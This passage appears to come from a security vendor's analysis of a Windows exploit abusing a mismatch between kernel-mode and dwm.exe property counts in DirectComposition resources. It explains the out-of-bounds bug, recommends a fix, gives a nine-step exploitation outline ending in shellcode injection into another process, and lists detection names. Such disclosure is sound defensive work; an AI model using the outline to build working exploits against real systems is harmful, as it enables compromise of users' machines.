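        return false;              // error: command not sent to dwm.exe
    c.user++;                      // success: dwm.exe adds it too
    return true;
}
```

After one successful add and one forced failure, the kernel believes the resource has two properties while dwm.exe has only one, so an UpdateProperty with propertyId 1 clears the kernel's propertiesCount check yet indexes out of bounds in user mode.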

An inconsistency between the number of properties assigned to the same resource in kernel mode and user mode could be a source of other vulnerabilities, so we recommend that Microsoft change the behavior of the AddProperty function and validate properties before they are added.

The whole exploitation process for the discovered exploit is as follows:

  1. Create a large number of resources with properties of a specific size to get the heap into a predictable state.
  2. Create additional resources with properties of a specific size and content to spray memory at specific locations with fake properties.
  3. Release the resources created at stage 2.
  4. Create additional resources with properties. These resources will be used to perform the OOB writes.
  5. Make holes among the resources created at stage 1.
  6. Create additional properties for the resources created at stage 4. Their buffers are expected to be allocated at specific locations.
  7. Create “special” properties to cause an inconsistency between the number of properties assigned to the same resource in kernel mode and user mode for the resources created at stage 4.
  8. Use the OOB write vulnerability to write shellcode, create an object and get code execution.
  9. Inject additional shellcode into another system process.

Kaspersky products detect this exploit with the verdicts:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic